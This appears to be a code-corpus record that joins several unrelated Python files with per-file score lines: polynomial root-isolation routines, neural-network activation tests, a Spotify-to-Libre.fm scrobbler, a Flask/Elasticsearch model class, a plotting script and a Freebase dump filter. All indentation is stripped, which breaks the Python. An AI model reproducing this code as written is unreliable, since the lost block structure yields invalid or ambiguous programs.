a1, a2, b1, b2 = a2, a1, b2, b1
c1, c2, d1, d2 = c2, c1, d2, d1
f1, f2, k1, k2 = f2, f1, k2, k1
if k1 == 0:
continue
if k1 == 1:
roots.append(dup_inner_refine_real_root(
f1, (a1, b1, c1, d1), cond, fast, K))
else:
stack.append((a1, b1, c1, d1, f1, k1))
if k2 == 0:
continue
if k2 == 1:
roots.append(dup_inner_refine_real_root(
f2, (a2, b2, c2, d2), cond, fast, K))
else:
stack.append((a2, b2, c2, d2, f2, k2))
return sorted(roots)
def dup_isolate_real_roots(f, K, **args):
"""Isolate real roots using continued fractions approach. """
if K.is_QQ:
(_, f), K = dup_ground_to_ring(f, K, convert=True), K.get_ring()
elif not K.is_ZZ:
raise DomainError("isolation of real roots not supported over %s" % K)
if dup_degree(f) <= 0:
return []
eps, fast = args.get('eps'), args.get('fast')
if eps is not None:
cond = lambda a, b, c, d, i, F: abs(F(a, c) - F(b, d)) < eps
else:
cond = lambda a, b, c, d, i, F: True
if args.get('sqf', False):
I_pos = dup_inner_isolate_real_roots(f, cond, fast, K)
f = dup_mirror(f, K)
I_neg = dup_inner_isolate_real_roots(f, cond, fast, K)
return sorted([ (-v, -u) for (u, v) in I_neg ] + I_pos)
_, factors = dup_sqf_list(f, K)
if len(factors) == 1:
((f, k),) = factors
I_pos = dup_inner_isolate_real_roots(f, cond, fast, K)
f = dup_mirror(f, K)
I_neg = dup_inner_isolate_real_roots(f, cond, fast, K)
return sorted([ ((-v, -u), k) for (u, v) in I_neg ] + \
[ (( u, v), k) for (u, v) in I_pos ])
I_pos, I_neg = [], []
F_pos, F_neg = {}, {}
for f, k in factors:
for u, v in dup_inner_isolate_real_roots(f, cond, fast, K):
I_pos.append((u, v, k))
g = dup_mirror(f, K)
for s, t in dup_inner_isolate_real_roots(g, cond, fast, K):
I_neg.append((s, t, k))
F_pos[k], F_neg[k] = f, g
step = lambda a, b, c, d, i, F: i >= 1
for i, (u, v, k) in enumerate(I_pos):
for j, (s, t, m) in enumerate(I_pos[i+1:]):
while not (s >= v or t <= u):
u, v = dup_outer_refine_real_root(F_pos[k], u, v, step, fast, K)
s, t = dup_outer_refine_real_root(F_pos[m], s, t, step, fast, K)
I_pos[i+j+1] = (s, t, m)
I_pos[i] = (u, v, k)
for i, (u, v, k) in enumerate(I_neg):
for j, (s, t, m) in enumerate(I_neg[i+1:]):
while not (s >= v or t <= u):
u, v = dup_outer_refine_real_root(F_neg[k], u, v, step, fast, K)
s, t = dup_outer_refine_real_root(F_neg[m], s, t, step, fast, K)
I_neg[i+j+1] = (s, t, m)
I_neg[i] = (u, v, k)
return sorted([ ((-v, -u), k) for (u, v, k) in I_neg ] + \
[ (( u, v), k) for (u, v, k) in I_pos ])
def _dup_inner_sturm(f, p, q, x, y, K):
"""Compute Sturm sequence at x+I*y in p+I*q direction. """
C = K.complex_domain()
a, b = C(p, q), C(x, y)
f = dup_convert(f, K, C)
f = dup_taylor(f, b, C)
f = dup_scale(f, a, C)
u = dup_strip([ C.real(c) for c in f ])
v = dup_strip([ C.imag(c) for c in f ])
seq = [u, v]
while seq[-1]:
s = dup_rem(seq[-2], seq[-1], K)
seq.append(dup_neg(s, K))
return seq[:-1]
def _dup_sturm_shift(F, c, K):
"""Shift origin of a Sturm sequence by a real number `c`. """
return [ dup_taylor(f, c, K) for f in F ]
def _dup_sturm_mirror(F, K):
"""Flip the direction of a Sturm sequence at its origin. """
return [ dup_mirror(f, K) for f in F ]
def _dup_inner_zeros(F1, F2, F3, F4, hx, hy, K):
"""Return the exact number of zeros in the given rectangle. """
V1 = [
dup_sign_variations([ dup_eval(f, hx, K) for f in F1 ], K),
dup_sign_variations([ dup_eval(f, hy, K) for f in F2 ], K),
dup_sign_variations([ dup_eval(f, hx, K) for f in F3 ], K),
dup_sign_variations([ dup_eval(f, hy, K) for f in F4 ], K),
]
V0 = [
dup_sign_variations([ dup_eval(f, K.zero, K) for f in F1 ], K),
dup_sign_variations([ dup_eval(f, K.zero, K) for f in F2 ], K),
dup_sign_variations([ dup_eval(f, K.zero, K) for f in F3 ], K),
dup_sign_variations([ dup_eval(f, K.zero, K) for f in F4 ], K),
]
return sum(v1 - v0 for v1, v0 in zip(V1, V0)) // 2
def dup_inner_refine_complex_root(f, x, y, dx, dy, F, K):
"""One bisection step of complex root refinement algorithm. """
hx, hy = dx/2, dy/2
cx, cy = x + hx, y + hy
F1, F2, F3, F4 = F
Fx = _dup_inner_sturm(f, K.one, K.zero, cx, cy, K)
Fy = _dup_inner_sturm(f, K.zero, K.one, cx, cy, K)
# Quadrant #1: ++
F11 = Fx
F12 = _dup_sturm_shift(F2, hx, K)
F13 = F3
F14 = _dup_sturm_mirror(_dup_sturm_shift(Fy, hy, K), K)
k1 = _dup_inner_zeros(F11, F12, F13, F14, hx, hy, K)
if k1 == 1:
return (cx, cy, hx, hy, (F11, F12, F13, F14))
# Quadrant #2: -+
F21 = _dup_sturm_shift(Fx,-hx, K)
F22 = Fy
F23 = _dup_sturm_shift(F3, hx, K)
F24 = F4
k2 = _dup_inner_zeros(F21, F22, F23, F24, hx, hy, K)
if k2 == 1:
return (x, cy, hx, hy, (F21, F22, F23, F24))
# Quadrant #3: --
F31 = F1
F32 = _dup_sturm_shift(Fy,-hy, K)
F33 = _dup_sturm_mirror(Fx, K)
F34 = _dup_sturm_shift(F4, hy, K)
k3 = _dup_inner_zeros(F31, F32, F33, F34, hx, hy, K)
if k3 == 1:
return (x, y, hx, hy, (F31, F32, F33, F34))
# Quadrant #4: +-
F41 = _dup_sturm_shift(F1, hx, K)
F42 = F2
F43 = _dup_sturm_mirror(_dup_sturm_shift(Fx, hx, K), K)
F44 = _dup_sturm_mirror(Fy, K)
k4 = _dup_inner_zeros(F41, F42, F43, F44, hx, hy, K)
if k4 == 1:
return (cx, y, hx, hy, (F41, F42, F43, F44))
raise RefinementFailed("no roots in (%s, %s) x (%s, %s) rectangle" % (x, y, x+dx, y+dy))
def dup_outer_refine_complex_root(f, x, y, dx, dy, F, eps, K):
"""Refine a complex root until the desired precision is reached. """
while dx >= eps and dy >= eps:
x, y, dx, dy, F = dup_inner_refine_complex_root(f, x, y, dx, dy, F, K)
return x, y, dx, dy, F
def dup_refine_complex_root(f, x, y, dx, dy, eps, K):
"""Refine a complex root using Wilf's global bisection algorithm. """
if K.is_ZZ or K.is_QQ:
K0, K = K, K.float_domain()
f = dup_convert(f, K0, K)
else:
raise DomainError("isolation of complex roots not supported over %s" % K)
F1 = _dup_inner_sturm(f, K.one, K.zero, x, y, K)
F2 = _dup_inner_sturm(f, K.zero, K.one, x+dx, y, K)
F3 = _dup_inner_sturm(f,-K.one, K.zero, x+dx, y+dy, K)
F4 = _dup_inner_sturm(f, K.zero,-K.one, x, y+dy, K)
F = (F1, F2, F3, F4)
x, y, dx, dy, _ = dup_outer_refine_complex_root(f, x, y, dx, dy, F, eps, K)
return x, y, dx, dy
def dup_inner_isolate_complex_roots(f, K, **args):
"""Compute disjoint complex root isolating rectangles for all quadrants. """
n, lc = dup_degree(f), abs(dup_LC(f, K))
B = 2*max(abs(c)/lc for c in f)
while True:
r = randfloat()
if r < 0.5:
break
x, y, dx, dy = -B+r, -B-r, 2*B+r, 2*B+r
roots, stack = [], []
F1 = _dup_inner_sturm(f, K.one, K.zero, x, y, K)
F2 = _dup_inner_sturm(f, K.zero, K.one, x+dx, y, K)
F3 = _dup_inner_sturm(f,-K.one, K.zero, x+dx, y+dy, K)
F4 = _dup_inner_sturm(f, K.zero,-K.one, x, y+dy, K)
k = _dup_inner_zeros(F1, F2, F3, F4, dx, dy, K)
if k != n:
return dup_inner_isolate_complex_roots(f, K)
if k == 1:
roots.append((x, y, dx, dy, (F1, F2, F3, F4)))
elif k > 1:
stack.append((x, y, dx, dy, k, F1, F2, F3, F4))
while stack:
x, y, dx, dy, k, F1, F2, F3, F4 = stack.pop()
hx, hy = dx/2, dy/2
cx, cy = x + hx, y + hy
Fx = _dup_inner_sturm(f, K.one, K.zero, cx, cy, K)
Fy = _dup_inner_sturm(f, K.zero, K.one, cx, cy, K)
# Quadrant #1: ++
F11 = Fx
F12 = _dup_sturm_shift(F2, hx, K)
F13 = F3
F14 = _dup_sturm_mirror(_dup_sturm_shift(Fy, hy, K), K)
k1 = _dup_inner_zeros(F11, F12, F13, F14, hx, hy, K)
if k1 == 1:
roots.append((cx, cy, hx, hy, (F11, F12, F13, F14)))
elif k1 > 1:
stack.append((cx, cy, hx, hy, k1, F11, F12, F13, F14))
# Quadrant #2: -+
F21 = _dup_sturm_shift(Fx,-hx, K)
F22 = Fy
F23 = _dup_sturm_shift(F3, hx, K)
F24 = F4
k2 = _dup_inner_zeros(F21, F22, F23, F24, hx, hy, K)
if k2 == 1:
roots.append((x, cy, hx, hy, (F21, F22, F23, F24)))
elif k2 > 1:
stack.append((x, cy, hx, hy, k2, F21, F22, F23, F24))
# Quadrant #3: --
F31 = F1
F32 = _dup_sturm_shift(Fy,-hy, K)
F33 = _dup_sturm_mirror(Fx, K)
F34 = _dup_sturm_shift(F4, hy, K)
k3 = _dup_inner_zeros(F31, F32, F33, F34, hx, hy, K)
if k3 == 1:
roots.append((x, y, hx, hy, (F31, F32, F33, F34)))
elif k3 > 1:
stack.append((x, y, hx, hy, k3, F31, F32, F33, F34))
# Quadrant #4: +-
F41 = _dup_sturm_shift(F1, hx, K)
F42 = F2
F43 = _dup_sturm_mirror(_dup_sturm_shift(Fx, hx, K), K)
F44 = _dup_sturm_mirror(Fy, K)
k4 = _dup_inner_zeros(F41, F42, F43, F44, hx, hy, K)
if k4 == 1:
roots.append((cx, y, hx, hy, (F41, F42, F43, F44)))
elif k4 > 1:
stack.append((cx, y, hx, hy, k4, F41, F42, F43, F44))
if len(roots) == n:
eps = args.get('eps')
if eps is not None:
for i, (x, y, dx, dy, F) in enumerate(roots):
roots[i] = dup_outer_refine_complex_root(f, x, y, dx, dy, F, eps, K)
return roots
else:
return dup_inner_isolate_complex_roots(f, K)
def dup_isolate_complex_roots(f, K, **args):
"""Isolate complex roots using Wilf's global bisection algorithm. """
if K.is_ZZ or K.is_QQ:
F = K.float_domain()
else:
raise DomainError("isolation of complex roots not supported over %s" % K)
squarefree = args.get('sqf', False)
if squarefree:
roots = dup_inner_isolate_complex_roots(dup_convert(f, K, F), F, **args)
else:
roots = []
_, factors = dup_sqf_list(f, K)
for g, k in factors:
g = dup_convert(g, K, F)
for r in dup_inner_isolate_complex_roots(g, F, **args):
roots.append((g, r, k))
if len(factors) > 1:
for i, (f1, r1, k1) in enumerate(roots):
x1, y1, dx1, dy1, F1 = r1
for j, (f2, r2, k2) in enumerate(roots[i+1:]):
x2, y2, dx2, dy2, F2 = r2
while not ((x2 >= x1+dx1 or x2+dx2 <= x1) and (y2 >= y1+dy1 or y2+dy2 <= y1)):
x1, y1, dx1, dy1, F1 = dup_inner_refine_complex_root(f1, x1, y1, dx1, dy1, F1, K)
x2, y2, dx2, dy2, F2 = dup_inner_refine_complex_root(f2, x1, y1, dx1, dy1, F2, K)
roots[i+j+1] = (f2, (x2, y2, dx2, dy2, F2), k2)
roots[i] = (f1, (x1, y1, dx1, dy1, F1), k1)
multiplicity = {}
for (_, (x, y, dx, dy, _), k) in roots:
multiplicity[(x, y, dx, dy)] = k
roots = multiplicity.keys()
groups = {}
for (x, y, dx, dy) in roots:
if x in groups:
groups[x].append((x, y, dx, dy))
else:
groups[x] = [(x, y, dx, dy)]
upper, lower = [], []
for group in groups.values():
while len(group) > 1:
_max = max([ r[1] for r in group ])
for i, (x, y, dx, dy) in enumerate(group):
if y == _max:
upper.append((x, y, dx, dy))
del group[i]
break
_min = min([ r[1] for r in group ])
for i, (x, y, dx, dy) in enumerate(group):
if y == _min:
lower.append((x, y, dx, dy))
del group[i]
break
upper = sorted(upper, key=lambda r: r[0])
lower = sorted(lower, key=lambda r: r[0])
if not squarefree:
for i, r in enumerate(upper):
upper[i] = (r, multiplicity[r])
for i, r in enumerate(lower):
lower[i] = (r, multiplicity[r])
return upper, lower
| 1.867188 | 2 |
tests/test_layers/test_activation.py | wkcn/mobula | 47 | 12795712 | import mobula.layers as L
import numpy as np
def test_sigmoid():
X = ((np.arange(10000) - 5000) / 1000.0).reshape((-1, 1, 1, 1))
data = L.Data(X, "data")
data.reshape()
l = L.Sigmoid(data)
l.reshape()
assert l.Y.shape == X.shape
l.forward()
l.dY = np.random.random(l.Y.shape) * 10
l.backward()
enx = np.exp(-X)
assert np.allclose(l.Y.ravel(), (1.0 / (1.0 + enx)).ravel())
assert np.allclose(l.dX.ravel(), (enx / np.square(1 + enx) * l.dY).ravel())
def test_relu():
X = ((np.arange(10000) - 5000) / 1000.0).reshape((-1, 1, 1, 1))
data = L.Data(X, "data")
data.reshape()
l = L.ReLU(data)
l.reshape()
assert l.Y.shape == X.shape
l.forward()
l.dY = np.random.random(l.Y.shape) * 10
l.backward()
Y = np.zeros(X.shape)
b = (X > 0)
Y[b] = X[b]
dX = np.zeros(X.shape)
dX[b] = l.dY[b]
'''
d = (l.dX != dX)
print (l.dX[d], dX[d])
'''
assert np.allclose(l.Y.ravel(), Y.ravel())
assert np.allclose(l.dX.ravel(), dX.ravel())
def test_selu():
X = ((np.arange(10000) - 5000) / 1000.0).reshape((-1, 1, 1, 1))
data = L.Data(X, "data")
data.reshape()
l = L.SELU(data)
y = l.eval()
ty = np.zeros(X.shape)
ty[X > 0] = l.scale * X[X>0]
ty[X<=0] = l.scale * (l.alpha * np.exp(X[X<=0]) - l.alpha)
assert np.allclose(y, ty)
l.dY = np.random.random(l.Y.shape)
l.backward()
dX = np.zeros(X.shape)
dX[X > 0] = l.scale
dX[X <= 0] = l.scale * l.alpha * np.exp(X[X<=0])
dX *= l.dY
assert np.allclose(dX, l.dX)
def test_PReLU():
X = ((np.arange(10000) - 5000) / 1000.0).reshape((-1, 1, 1, 1))
data = L.Data(X, "data")
data.reshape()
l = L.PReLU(data)
y = l.eval()
ty = np.zeros(X.shape)
ty[X>0] = X[X>0]
ty[X<=0] = l.alpha * X[X<=0]
assert np.allclose(y, ty)
l.dY = np.random.random(l.Y.shape)
l.backward()
dX = np.zeros(X.shape)
dX[X>0] = 1
dX[X<=0] = l.alpha
dX *= l.dY
print (dX, l.dX)
assert np.allclose(dX, l.dX)
def test_tanh():
X = ((np.arange(10000) - 5000) / 1000.0).reshape((-1, 1, 1, 1))
data = L.Data(X, "data")
data.reshape()
l = L.Tanh(data)
y = l.eval()
p = np.exp(X)
n = np.exp(-X)
ty = (p - n) / (p + n)
assert np.allclose(y, ty)
l.dY = np.random.random(l.Y.shape)
l.backward()
dX = 1.0 - np.square(p - n) / np.square(p + n)
dX *= l.dY
assert np.allclose(dX, l.dX)
| 3.0625 | 3 |
sls.py | yyyyyyyan/spotify-libre-scrobbler | 0 | 12795713 | <reponame>yyyyyyyan/spotify-libre-scrobbler
import os
import pickle
import sys
from argparse import ArgumentParser
from configparser import ConfigParser
from datetime import datetime
from getpass import getpass
from hashlib import md5
from math import ceil
from pylast import LibreFMNetwork, SessionKeyGenerator, WSError
from spotipy import Spotify, SpotifyOAuth
def hash_librefm_password(password):
return md5(password.encode("utf8")).hexdigest()
def init_config(**kwargs):
config_filename = kwargs["config_file"]
config = ConfigParser()
print(
"Follow the instructions and enter the requested information to create the config file\n"
)
spotify_conf = dict()
print("-" * 27)
print("Configuring Spotify API:\n")
print(
"1 - Create an app on Spotify for Developers (https://developer.spotify.com/dashboard/applications)"
)
print("2 - Input the following information (available on the app page):")
spotify_conf["client_id"] = input("Client ID: ")
spotify_conf["client_secret"] = input("Client Secret: ")
print(
"3 - On the app page, click on Edit Settings, enter a URI on the Redirect URIs field and save. (Note: the URI doesn't need to be accessible. By default we use http://localhost)"
)
print("4 - Input the following information:")
spotify_conf["redirect_uri"] = (
input("Redirect URI [http://localhost]: ") or "http://localhost"
)
spotify_conf["username"] = input("Spotify username: ")
config["spotify"] = spotify_conf
librefm_conf = dict()
print("-" * 27)
print("Configuring Libre.fm API:\n")
librefm_conf["username"] = input("Libre.fm username: ")
librefm_conf["password_hash"] = hash_librefm_password(
getpass("Libre.fm password: ")
)
config["libre.fm"] = librefm_conf
print("-" * 27)
print(f"Saving config to {config_filename}")
with open(config_filename, "w") as config_file:
config.write(config_file)
def save_tracks(filename, tracks):
with open(filename, "wb") as pickle_file:
pickle.dump(tracks, pickle_file, pickle.HIGHEST_PROTOCOL)
def main(**kwargs):
config_file = kwargs["config"]
if len(sys.argv) <= 2 and not os.path.isfile(config_file):
print(f"Default config file ({config_file}) not found and no arguments passed")
print("Run the following command to generate a config file:")
print(f"\t{sys.argv[0]} init")
sys.exit(1)
config = ConfigParser()
if os.path.isfile(config_file):
config.read(config_file)
else:
config["spotify"] = dict()
config["libre.fm"] = dict()
try:
auth = SpotifyOAuth(
kwargs["spotify_client_id"] or config["spotify"]["CLIENT_ID"],
kwargs["spotify_client_secret"] or config["spotify"]["CLIENT_SECRET"],
kwargs["spotify_redirect_uri"] or config["spotify"]["REDIRECT_URI"],
username=kwargs["spotify_user"] or config["spotify"]["USERNAME"],
cache_path=kwargs["cache_path"] or config["spotify"]["CACHE_PATH"],
scope="user-read-recently-played",
)
except KeyError as err:
print(f"Missing Spotify config/parameter {err}")
sys.exit(1)
if kwargs["force_refresh_token"]:
auth.refresh_access_token(auth.get_cached_token()["refresh_token"])
spotify = Spotify(auth_manager=auth)
print("Searching recent tracks")
if kwargs["search_after"]:
last_timestamp = int(
datetime.strptime(
kwargs["search_after"], kwargs["search_after_fmt"]
).timestamp()
* 1000
)
else:
last_timestamp = kwargs["last_timestamp"] or config["spotify"].get(
"LAST_TIMESTAMP"
)
recent_tracks = spotify.current_user_recently_played(after=last_timestamp)
cursors = recent_tracks["cursors"]
last_timestamp = cursors["after"] if cursors is not None else last_timestamp
config["spotify"]["LAST_TIMESTAMP"] = last_timestamp
tracks_file = kwargs["tracks_file"]
spotify_tracks = recent_tracks["items"]
if kwargs["scrobble_remaining"] and os.path.isfile(tracks_file):
with open(tracks_file, "rb") as pickle_file:
spotify_tracks.extend(pickle.load(pickle_file))
print(f"Found {len(spotify_tracks)} tracks to scrobble!")
print("Organizing tracks...")
tracks = []
for track in spotify_tracks:
try:
track_info = {
"artist": track["track"]["artists"][0]["name"],
"title": track["track"]["name"],
"album": track["track"]["album"]["name"],
"track_number": track["track"].get("track_number"),
"duration": ceil(track["track"]["duration_ms"] / 1000),
"timestamp": int(
datetime.strptime(
track["played_at"], "%Y-%m-%dT%H:%M:%S.%f%z"
).timestamp()
),
}
tracks.append(track_info)
except Exception as err:
print("Error reading track metadata")
print(err)
print(track)
print(f"Saving non-scrobbled tracks to {tracks_file}")
save_tracks(tracks_file, spotify_tracks)
sys.exit(1)
librefm_auth = {key.lower(): value for key, value in config["libre.fm"].items()}
librefm_auth["username"] = kwargs["librefm_user"] or librefm_auth["username"]
librefm_auth["password_hash"] = (
hash_librefm_password(kwargs["librefm_password"])
if kwargs["librefm_password"]
else librefm_auth["password_hash"]
)
if tracks:
tries = 10
while tries:
tries -= 1
librefm = LibreFMNetwork(**librefm_auth)
print("Scrobbling tracks...")
try:
librefm.scrobble_many(tracks)
except WSError:
print(f"Error: Invalid session! {tries} tries remaining")
print("Getting new session...")
skg = SessionKeyGenerator(librefm)
url = skg.get_web_auth_url()
print(f"Authorize the app: {url}")
input("Press ENTER when done")
session_key = skg.get_web_auth_session_key(url)
librefm_auth["session_key"] = session_key
else:
print("Scrobbling successful!")
config["libre.fm"]["SESSION_KEY"] = librefm_auth["session_key"]
break
else:
print("Scrobbling unsuccessful :(")
print(f"Saving non-scrobbled tracks to {tracks_file}")
save_tracks(tracks_file, spotify_tracks)
sys.exit(1)
if kwargs["write_config"]:
with open(config_file, "w") as config_file:
config.write(config_file)
print("Saved config file! ;)")
if __name__ == "__main__":
parser = ArgumentParser()
subparsers = parser.add_subparsers()
scrobble_parser = subparsers.add_parser(
"scrobble", help="Scrobble your Spotify's recently played tracks to libre.fm",
)
scrobble_parser.set_defaults(func=main)
scrobble_parser.add_argument(
"-c",
"--config",
default="config.ini",
help="Config file to read script parameters (default: %(default)s)",
)
scrobble_parser.add_argument(
"--no-write-config",
dest="write_config",
action="store_false",
help="Don't write to config at the end",
)
scrobble_parser.add_argument(
"--tracks-file",
default=".tracks.pickle",
help="File to save non-scrobbled tracks in case of any error",
)
scrobble_parser.add_argument(
"--ignore-tracks-file",
dest="scrobble_remaining",
action="store_false",
help="Don't try to scrobble remaining tracks saved on tracks-file",
)
spotify_group = scrobble_parser.add_argument_group(
"Spotify", description="Spotify related parameters"
)
spotify_group.add_argument("--spotify-user", help="Your Spotify username")
spotify_group.add_argument("--cache-path", help="Spotify's cache path")
spotify_group.add_argument(
"--spotify-redirect-uri",
default="http://localhost",
help="Spotify redirect URI set on your Spotify Developer's page - doesn't need to be accessible (default: %(default)s)",
)
spotify_group.add_argument("--spotify-client-id", help="Your Spotify Client ID")
spotify_group.add_argument(
"--spotify-client-secret", help="Your Spotify Client Secret"
)
spotify_group.add_argument(
"--force-refresh-token",
action="store_true",
help="Force refresh your Spotify Client Token before starting the routine",
)
last_played = spotify_group.add_mutually_exclusive_group()
last_played.add_argument(
"--last-timestamp",
type=int,
help="UNIX timestamp (milliseconds) representing the date and time you listened the last scrobbled Spotify track",
)
last_played.add_argument(
"--search-after",
help="Only tracks played after this date and time will be scrobbled. Must follow search-after-fmt format",
)
spotify_group.add_argument(
"--search-after-fmt",
default="%Y-%m-%dT%H:%M:%S.%f%z",
help="Datetime format (in strftime syntax) for search-after (default: %(default)s)",
)
librefm_group = scrobble_parser.add_argument_group(
"Libre.fm", description="Libre.fm related parameters"
)
librefm_group.add_argument("--librefm-user", help="Your Libre.fm username")
librefm_group.add_argument("--librefm-password", help="<PASSWORD>")
init_parser = subparsers.add_parser(
"init", help="CLI wizard to generate a config file"
)
init_parser.add_argument(
"config_file",
nargs="?",
default="config.ini",
help="Config file to save settings (default: %(default)s)",
)
init_parser.set_defaults(func=init_config)
help_parser = subparsers.add_parser(
"help", help="Show the complete help message for all commands", add_help=False,
)
help_parser.set_defaults(
func=lambda **kwargs: print(
f"{scrobble_parser.format_help()}\n{'-'*27}\n{init_parser.format_help()}"
)
)
args = parser.parse_args()
dict_args = vars(args)
if dict_args:
args.func(**dict_args)
else:
parser.print_help()
| 3.0625 | 3 |
rhoci/models/DFG.py | ahmedmagdyawaad/redhat-ci-dashboard | 8 | 12795714 | # Copyright 2019 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
from elasticsearch import Elasticsearch
from flask import current_app as app
import re
import yaml
from rhoci.database import Database
class DFG(object):
def __init__(self, name, squads=[], components=[],
squad_to_components={}):
self.name = name
self.squads = squads
self.components = components
self.squad_to_components = squad_to_components
def insert(self):
"""Inserts object to the database."""
if not Database.find_one("DFGs", {"name": self.name}):
Database.insert(collection='DFGs',
data=self.json())
def json(self):
return {
'name': self.name,
'squads': self.squads,
'components': self.components,
'squad_to_components': self.squad_to_components,
}
@classmethod
def get_all_DFGs_based_on_jobs(cls):
"""Returns a list of all DFGs based on job model where it cuts the
DFG name from the job name and makes sure the set is unique.
"""
DFGs = []
es = Elasticsearch(app.config['custom']['elk']['es']['url'])
body = {
"size": 0,
"aggs" : {
"jobs" : {
"terms" : { "field" : "DFG.keyword", "size" : 4000 }
}
}
}
result = es.search(index="logstash", body=body)
for bucket in result["aggregations"]['jobs']['buckets']:
DFGs.append(bucket['key'])
return DFGs
@classmethod
def get_all_squads(cls):
squads = []
for DFG_db in cls.find():
if DFG_db['squads']:
squads.extend(DFG_db['squads'])
return squads
@classmethod
def get_all_components(cls):
components = []
for DFG_db in cls.find():
if DFG_db['components']:
components.extend(DFG_db['components'])
return components
@classmethod
def get_squad(cls, DFG_name, component):
DFG_db = cls.find_one(name=DFG_name)
if DFG_db['squad_to_components']:
for squad, components in DFG_db['squad_to_components'].items():
for comp in components:
if comp == component:
return squad
if component == components:
return squad
return
@classmethod
def get_squad_components(cls, DFG_name, squad):
"""Returns all the components of a given squad."""
DFG_db = cls.find_one(name=DFG_name)
return DFG_db['squad_to_components'][squad]
@classmethod
def find(cls):
"""Returns find query."""
query = {}
DFGs = Database.find(collection="DFGs", query=query)
return DFGs
@classmethod
def find_one(cls, name):
"""Returns one query result."""
query = {}
if name:
query['name'] = name
DFGs = Database.find_one(collection="DFGs", query=query)
return DFGs
@classmethod
def count(cls, squads=False):
"""Returns the count of DFGs documents."""
query = {}
if squads:
return len(cls.get_all_squads())
else:
DFGs = Database.find(collection='DFGs', query=query)
return DFGs.count()
| 2.21875 | 2 |
GifGen/complexity.py | james-alvey-42/ProgramTools | 0 | 12795715 | <filename>GifGen/complexity.py<gh_stars>0
'''
Idea based on Shangnan (2019) [http://inspirehep.net/record/1722270] regarding classical complexity and it's relation to entropy. This script considers a string of K n-bits (x1 x2 ... xK) in an "all-i" configuration. It then randomly updates the configuration to illustrate the long term behaviour.
'''
import numpy as np
import matplotlib.pyplot as plt
from random import randint
import sys
plt.style.use('ja')
def update_configuration(state, n):
K = len(state) - 1
idx = randint(0, K)
up = bool(randint(0, 1))
if up:
if state[idx] != n - 1:
state[idx] = state[idx] + 1
else:
state[idx] = 0
else:
if state[idx] != 0:
state[idx] = state[idx] - 1
else:
state[idx] = n - 1
return state
bar_color = '#477890'
line_color = '#990D35'
text_color = '#153243'
if __name__ == '__main__':
K = int(sys.argv[1])
n = int(sys.argv[2])
iters = int(sys.argv[3])
state = np.zeros(K) + randint(0, n - 1)
iter = 0
plt.ion()
plt.figure(figsize=(7, 7))
while iter < iters:
print(str(iter) + '/' + str(iters), end='\r')
unique, counts = np.unique(state, return_counts=True)
plt.bar(unique, counts, width=0.5, align='center', alpha=1.0, color=bar_color)
axis = plt.axis()
axis = (-0.1*n, 1.1*n - 1, 0, K)
vals = np.linspace(-n, 2*n, 100)
avg = np.zeros(100) + (K/n)
plt.plot(vals, avg, lw = 4, color=line_color, alpha = 0.8)
plt.axis(axis)
style = dict(size=15, color=text_color)
plt.text(0.3*n - 1, 0.9*K, r'$K = {} \,$'.format(K) + r', ' + '$n = {} \,$'.format(n) + r', ' + r'Iteration: ${} / {} \,$'.format(iter, iters), **style, bbox=dict(facecolor='white', edgecolor='black', boxstyle='round,pad=0.3'))
plt.xticks([])
plt.draw()
#plt.savefig('frames/fig_' + '{0:04d}'.format(iter), transparent=True)
plt.pause(0.0001)
plt.clf()
state = update_configuration(state, n)
iter += 1
| 3.09375 | 3 |
convert/explode-dump.py | google/freebase-wikidata-converter | 57 | 12795716 | <reponame>google/freebase-wikidata-converter
"""
Copyright 2015 Google Inc. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import gzip
import sys
filters = [
'<http://rdf.freebase.com/ns/common.notable_for.display_name>',
'<http://www.w3.org/1999/02/22-rdf-syntax-ns#type>',
'<http://rdf.freebase.com/ns/type.object.type>',
'<http://rdf.freebase.com/ns/type.type.instance>',
'<http://rdf.freebase.com/ns/type.object.key>',
'<http://www.w3.org/2000/01/rdf-schema#label>',
'<http://rdf.freebase.com/ns/type.object.name>',
'<http://rdf.freebase.com/ns/common.topic.topic_equivalent_webpage>',
'<http://rdf.freebase.com/ns/common.topic.notable_for>',
'<http://rdf.freebase.com/ns/common.notable_for.predicate>',
'<http://rdf.freebase.com/ns/common.notable_for.notable_object>',
'<http://rdf.freebase.com/ns/common.notable_for.object>',
'<http://rdf.freebase.com/ns/common.topic.notable_types>',
'<http://rdf.freebase.com/ns/common.topic.description>',
'<http://rdf.freebase.com/key/dataworld.freeq>',
'<http://rdf.freebase.com/ns/type.permission.controls>',
'<http://rdf.freebase.com/ns/type.object.permission>',
'<http://rdf.freebase.com/key/en>',
'<http://rdf.freebase.com/ns/common.document.text>',
'<http://rdf.freebase.com/ns/common.topic.article>',
'<http://rdf.freebase.com/ns/common.topic.image>',
'<http://rdf.freebase.com/ns/common.topic.alias>',
'<http://rdf.freebase.com/ns/common.document.source_uri>',
'<http://rdf.freebase.com/ns/dataworld.gardening_hint.last_referenced_by>',
'<http://rdf.freebase.com/ns/type.object.id>',
'<http://rdf.freebase.com/ns/dataworld.gardening_hint.replaced_by>',
'<http://rdf.freebase.com/ns/freebase.object_hints.best_hrid>'
]
linecount = 0
filtercount = 0
result = open(sys.argv[2], 'w')
types = open(sys.argv[3], 'w')
labels = open(sys.argv[4], 'w')
for line in gzip.open(sys.argv[1]):
linecount += 1
if linecount % 1000000 == 0 : print filtercount, linecount / 1000000
sub, pred, obj, dot = line.split("\t")
if not (sub.startswith('<http://rdf.freebase.com/ns/m.') or sub.startswith('<http://rdf.freebase.com/ns/g.')):
continue
if pred == '<http://rdf.freebase.com/ns/type.object.type>':
types.write(sub[28:-1] + "\t" + obj[24:-1] + "\n")
continue
if pred == '<http://rdf.freebase.com/ns/type.object.name>':
labels.write(sub[28:-1] + "\t" + obj + "\n")
continue
if pred in filters:
continue
if pred.startswith('/fictional_universe'):
continue
if 'wikipedia' in pred:
continue
if 'topic_server' in pred:
continue
